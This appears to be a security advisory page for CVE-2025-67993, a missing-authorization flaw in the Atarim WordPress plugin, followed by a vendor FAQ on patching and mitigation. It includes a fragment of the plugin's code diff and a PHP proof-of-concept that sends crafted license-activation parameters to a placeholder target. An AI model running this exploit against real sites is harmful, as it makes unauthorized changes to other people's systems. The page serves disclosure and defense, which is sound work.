'", wpf_resolution="' . addslashes( $wpf_resolution ) . '", wpf_browser="' . addslashes( $wpf_browser ) . '", wpf_user_name="' . addslashes( $wpf_user_name ) . '", wpf_user_ip="' . addslashes( $wpf_user_ip ) . '", wpf_task_id="' . addslashes( $wpf_task_id ) . '", wpf_delete_ticket="' . addslashes( $wpf_delete_ticket ) . '", wpf_delete_conform_text1="' . addslashes( $wpf_delete_conform_text1 ) . '", wpf_delete_conform_text2="' . addslashes( $wpf_delete_conform_text2 ) . '", wpf_yes="' . addslashes( $wpf_yes ) . '", wpf_general_tag="' . addslashes( $wpf_general_tag ) . '", wpf_email_tag="' . addslashes( $wpf_email_tag ) . '", wpf_just_now="' . addslashes( $wpf_just_now ) . '", wpf_task_upload_error_msg="' . addslashes( $wpf_task_upload_error_msg ) . '", wpf_send_message_text= "' . addslashes( $wpf_send_message_text ) . '", wpf_push_to_media_error_msg= "' . addslashes( $wpf_push_to_media_error_msg ) . '", wpf_by="' . addslashes( $wpf_by ) . '", create_internal_task= "' . addslashes( $create_internal_task ) . '", switch_to_normal= "' . addslashes( $switch_to_normal ) . '", switch_to_internal= "' . addslashes( $switch_to_internal ) . '", add_note= "' . addslashes( $add_note ) . '"</script>';
+$all_popup_lable             = '<script>var wpf_remap_text="' . addslashes( $wpf_remap_text ) . '", wpf_general_task_option="' . addslashes( $wpf_general_task_option ) . '", wpf_tasks_found="' . addslashes( $wpf_tasks_found ) . '", wpf_bulk_editing_tasks="' . addslashes( $wpf_bulk_editing_tasks ) . '", wpf_remove_login_parameter="' . addslashes( $wpf_remove_login_parameter ) . '", wpf_share_task_link="' . addslashes( $wpf_share_task_link ) . '", wpf_custom_tags="' . addslashes( $wpf_custom_tags ) . '", wpf_additional_information="' . addslashes( $wpf_additional_information ) . '", wpf_priority_low="' . addslashes( $wpf_priority_low ) . '", wpf_priority_medium= "' . addslashes( $wpf_priority_medium ) . '", wpf_priority_high="' . addslashes( $wpf_priority_high ) . '", wpf_priority_critical="' . addslashes( $wpf_priority_critical ) . '", wpf_status_open_task="' . addslashes( $wpf_status_open_task ) . '", wpf_status_in_progress= "' . addslashes( $wpf_status_in_progress ) . '", wpf_status_pending_review="' . addslashes( $wpf_status_pending_review ) . '", wpf_status_complete="' . addslashes( $wpf_status_complete ) . '", wpf_complete_task="' . addslashes( $wpf_complete_task ) . '", wpf_completed_task="' . addslashes( $wpf_completed_task ) . '", wpf_screenshot_view = "' . addslashes( $wpf_screenshot_view ) . '", wpf_comment_box_placeholder="' . addslashes( $wpf_comment_box_placeholder ) . '", wpf_create_task="' . addslashes( $wpf_create_task ) . '", wpf_add_comment_btn="' . addslashes( $wpf_add_comment_btn ) . '", wpf_mark_internal_btn="' . addslashes( $wpf_mark_internal_btn ) . '", wpf_task_text_error_msg="' . addslashes( $wpf_task_text_error_msg ) . '", wpf_task_note_error_msg="' . addslashes( $wpf_task_note_error_msg ) . '" , wpf_upload_invalid_file_msg="' . addslashes( $wpf_upload_invalid_file_msg ) . '", wpf_resolution="' . addslashes( $wpf_resolution ) . '", wpf_browser="' . addslashes( $wpf_browser ) . '", wpf_user_name="' . addslashes( $wpf_user_name ) . '", wpf_user_ip="' . addslashes( $wpf_user_ip ) . '", wpf_task_id="' . addslashes( $wpf_task_id ) . '", wpf_delete_ticket="' . addslashes( $wpf_delete_ticket ) . '", wpf_delete_conform_text1="' . addslashes( $wpf_delete_conform_text1 ) . '", wpf_delete_conform_text2="' . addslashes( $wpf_delete_conform_text2 ) . '", wpf_yes="' . addslashes( $wpf_yes ) . '", wpf_general_tag="' . addslashes( $wpf_general_tag ) . '", wpf_email_tag="' . addslashes( $wpf_email_tag ) . '", wpf_just_now="' . addslashes( $wpf_just_now ) . '", wpf_task_upload_error_msg="' . addslashes( $wpf_task_upload_error_msg ) . '", wpf_send_message_text= "' . addslashes( $wpf_send_message_text ) . '", wpf_by="' . addslashes( $wpf_by ) . '", create_internal_task= "' . addslashes( $create_internal_task ) . '", switch_to_normal= "' . addslashes( $switch_to_normal ) . '", switch_to_internal= "' . addslashes( $switch_to_internal ) . '", add_note= "' . addslashes( $add_note ) . '"</script>';
 _e( $all_popup_lable );
 No newline at end of file

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2025-67993 - Atarim <= 4.2.1 - Missing Authorization
<?php

$target_url = 'http://vulnerable-wordpress-site.com/';

// Base64-encoded values simulating license activation payload
// These would normally be provided by the Atarim service during legitimate activation
$payload = [
    'atarim_response' => 'd3BmX2xpY2Vuc2Vfa2V5X2hlcmU=', // base64_encode('wpf_license_key_here')
    'license_key'     => 'bGljZW5zZV9rZXlfZW5jb2RlZA==', // base64_encode('license_key_encoded')
    'expires'         => 'MjAyNS0xMi0zMQ==',             // base64_encode('2025-12-31')
    'prod_id'         => 'cHJvZF8xMjM=',                 // base64_encode('prod_123')
    'payment_id'      => 'cGF5bWVudF8xMjM=',             // base64_encode('payment_123')
    'checksum'        => 'Y2hlY2tzdW1fYWJj',             // base64_encode('checksum_abc')
    'wpf_site_id'     => 'c2l0ZV8xMjM=',                 // base64_encode('site_123')
];

// Build query string
$query_string = http_build_query($payload);
$attack_url = $target_url . '?' . $query_string;

echo "[*] Target: $target_urln";
echo "[*] Sending exploit request to trigger license activation...n";

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $attack_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$redirect_url = curl_getinfo($ch, CURLINFO_REDIRECT_URL);

curl_close($ch);

// Analyze response
echo "[+] HTTP Response Code: $http_coden";
if ($redirect_url) {
    echo "[+] Redirected to: $redirect_urln";
}

if ($http_code == 200 || $http_code == 302 || $http_code == 301) {
    echo "[!] Exploit likely successful. License activation triggered.n";
    echo "[!] The plugin options and user metadata may have been modified.n";
} else {
    echo "[-] Exploit may have failed. Site might be patched or unreachable.n";
}

?>

Frequently Asked Questions

What is CVE-2025-67993?
Overview of the vulnerability
CVE-2025-67993 is a medium severity vulnerability in the Atarim Visual Collaboration plugin for WordPress, affecting versions up to and including 4.2.1. It is caused by a missing authorization check in the license activation function, allowing unauthenticated attackers to perform unauthorized actions.
How does the vulnerability work?
Mechanics of the exploit
The vulnerability allows attackers to send a crafted HTTP GET request with specific parameters to trigger administrative actions without authentication. This includes actions like license activation and user role escalation, which can compromise site integrity.
Who is affected by this vulnerability?
Identifying vulnerable installations
Any WordPress site using the Atarim Visual Collaboration plugin version 4.2.1 or earlier is affected. Administrators should check their plugin version to determine if they need to take action.
How can I check if my site is vulnerable?
Version verification steps
To check for vulnerability, log into your WordPress admin panel and navigate to the Plugins section. Look for the Atarim Visual Collaboration plugin and verify its version number; if it is 4.2.1 or earlier, your site is vulnerable.
What steps should I take to fix the vulnerability?
Updating the plugin
The vulnerability is patched in version 4.2.2 of the Atarim plugin. Administrators should update to this version immediately to ensure that the missing authorization checks are in place.
What if I cannot update the plugin immediately?
Mitigation strategies
If an immediate update is not possible, consider disabling the Atarim plugin until a patch can be applied. Additionally, review user roles and permissions to limit access to sensitive areas of your WordPress site.
What does a CVSS score of 5.3 indicate?
Understanding severity levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it poses a significant risk that could lead to unauthorized access and potential data compromise.
How does the proof of concept demonstrate the issue?
Insight into exploitation
The proof of concept provided shows how an attacker can craft a specific HTTP GET request that exploits the vulnerability. It outlines the required parameters, demonstrating how unauthorized actions can be executed without authentication.
What are the potential consequences of exploitation?
Impact on site security
If exploited, an attacker could gain control over the plugin’s license state, escalate user roles, and modify site configurations. This could lead to unauthorized access to sensitive data and disruption of site functionality.
Are there any additional security measures I should consider?
Best practices for WordPress security
In addition to updating the Atarim plugin, ensure that all plugins and themes are regularly updated, implement strong user authentication practices, and consider using security plugins that monitor for unauthorized changes and access.
How can I stay informed about future vulnerabilities?
Keeping up with security updates
Subscribe to security mailing lists or follow platforms like the National Vulnerability Database (NVD) and WordPress security blogs. Regularly review security advisories related to the plugins and themes you use.
What should I do if I suspect my site has been compromised?
Response to potential breaches
If you suspect a compromise, immediately take your site offline, change all passwords, and review user accounts for unauthorized changes. Consult with a security professional to conduct a thorough investigation and remediation.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations